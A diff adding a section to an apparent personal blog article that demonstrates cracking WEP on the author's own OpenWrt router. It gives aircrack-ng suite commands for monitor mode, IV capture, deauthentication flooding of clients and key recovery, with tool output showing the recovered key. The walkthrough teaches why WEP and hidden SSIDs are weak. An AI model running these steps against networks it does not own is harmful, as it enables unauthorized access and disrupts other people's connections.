axiomiety/axiomiety.github.io/articles/misc_wireless_insecurity.markdown

 ### Level 0x2 ###

 Let's up the ante a bit by enabling WEP on the router.
 And we'll leave the SSID hidden too.

+In order to obtain the WEP key, we need to capture a lot of traffic - specifically, we're looking for IVs (Initialisation Vectors).
+We won't crafting our own tools for this, but use the `air`-suite instead.
+Let's start by creating a monitor interface: `airmon-ng start wlan0`.

+We can then start listening for traffic with `airodump-ng --bssid 10:fe:ed:61:fa:e8 --channel 11 mon0`:

+     CH 11 ][ Elapsed: 7 mins ][ 2014-09-26 22:53

+     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

+     10:FE:ED:61:FA:E8  -63 100     3617    33100    0  11  54e.
+WEP  WEP         OpenWrt

+     BSSID              STATION            PWR   Rate    Lost    Frames  Probe

+     10:FE:ED:61:FA:E8  00:26:37:97:9A:7E  -56   11e-11      0    46737

+Technically we could listen on passively and collect packets as they go - but if it's a quiet network, it'll take ages for us to get enough packets to start cracking the key.
+As described on the [aircrack wiki](http://www.aircrack-ng.org/doku.php?id=simple_wep_crack), normal traffic does not generate IV packets quickly.
+What does however, is client authentication.
+As this is our own network and we're not trying to be subtle, we can force clients to de-authenticate (cf above when we used `aireplay-ng -0 1 -a 10:fe:ed:61:fa:e8 mon0` to blindly broadcast deauth packets to every client).

+The question is though, how many IVs are sufficient.
+It seems to really depend - sometimes you might get lucky and only need a hanful - others you might need to just wait it out.
+I set up the router to use a 40bit key because it was taking too long with 104bit one (heh).

+Once you feel you have collected enough, `ctrl-c` airodump-ng (note you can re-run it, and it will just keep incrementing the packet dumps).
+Side note - in the interest of saving space, you can ask airodump-ng to only capture IVs with the `-ivs` flag.
+We can now try to crack the key using `aircrack-ng OpenWrt.dump-0*.ivs`.

+I was fairly lucky, and the tool managed to recover the key with only 768 IVs:

+                                          Aircrack-ng 1.2 beta1

+                              [00:00:03] Tested 529255 keys (got 768 IVs)

+       KB    depth   byte(vote)
+        0   86/ 87   F6(1024) 08( 768) 0A( 768) 15( 768) 1A( 768) 1B( 768) 1C( 768)
+        1    5/  8   AA(1792) 05(1536) 17(1536) 26(1536) 4F(1536) 64(1536) 65(1536)
+        2    8/  9   E0(1792) 33(1536) 37(1536) 48(1536) 7E(1536) 98(1536) BA(1536)
+        3   30/  3   F5(1536) 15(1280) 1B(1280) 1C(1280) 50(1280) 57(1280) 5A(1280)
+        4    8/  4   FA(1792) 13(1536) 22(1536) 45(1536) 53(1536) 62(1536) AE(1536)

+                         KEY FOUND! [ 69:72:69:73:68 ] (ASCII: irish )
+      Decrypted correctly: 100%

+And voila - key found!

+### Wrapping up ###

+We've briefly shown that security through obscurity doesn't work - hidden SSIDs don't stay hidden for long.
+Likewise, MAC address filtering can be bypassed easily.
+And finally, Wired Equivalent Privacy (WEP) doesn't offer much privacy at all.
+Not to say it's useless, but just like medieval fortifications, security is best done through layers.
+And for the rest of us, there's always WPA2!